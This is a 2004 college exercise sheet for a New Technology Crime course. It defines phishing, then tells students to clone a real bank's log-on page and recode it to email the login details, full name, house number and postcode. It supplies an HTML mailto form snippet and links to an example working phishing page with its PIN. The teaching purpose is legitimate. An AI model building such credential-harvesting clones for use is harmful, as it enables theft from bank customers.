EXERCISE 1: Set: 09.02.04 Complete: 16.02.04

Lee Ellis (New Technology Crime)

EXERCISE 1: Set: 09.02.04 – Complete: 16.02.04

Background:

Phishing

(FISH.ing) pp. Creating a replica of an existing Web page to fool a user into submitting personal, financial, or password data. —adj.
—phisher n.

The term phishing comes from the fact that Internet scammers are using increasingly sophisticated lures as they "fish" for users' financial information and password data. The most common ploy is to copy the Web page code from a major site — such as AOL — and use that code to set up a replica page that appears to be part of the company's site. (This is why phishing is also called spoofing.) A fake e-mail is sent out with a link to this page, which solicits the user's credit card data or password. When the form is submitted, it sends the data to the scammer while leaving the user on the company's site so they don't suspect a thing.

Task:

Individually, locate a bank Web site, this can be an on-line bank or high street bank, and go to the ‘log-on’ screen. This is the screen that requires the user to input name and password data. Copy the page and re-design and code it (HTML) so that the data is sent to the following email address:

You may need to research HTML forms. In addition to the user log-on details, please also ensure that a full name, house number and postcode are also submitted with the ‘form’. You should submit your name on the form to complete the exercise. Microsoft FrontPage or Macromedia Dreamweaver is provided by the college for Web design. Please ensure that you add this text to your page “This is a fake Web page constructed as part of a training exercise”.

There is no need to upload or ‘publish’ your ‘phishing’ page. When previewing your page in Internet Explorer, you can submit the form details from there, if a connection to the Internet is established.

An example, working phishing site can be located at:

http://myweb.tiscali.co.uk/uce_research/natw_pin.html

The pin number to access this page is: 4290

You may find this code useful:

<form name="email" method="POST" action="mailto:"

onSubmit="return mailMe( this.form )" enctype="text/plain">

This exercise and everything covered by the new technology and crime lectures can be accessed online at:

http://myweb.tiscali.co.uk/uce_research/newtechcrime.html

or

http://myweb.tiscali.co.uk/uce_research/Bp.html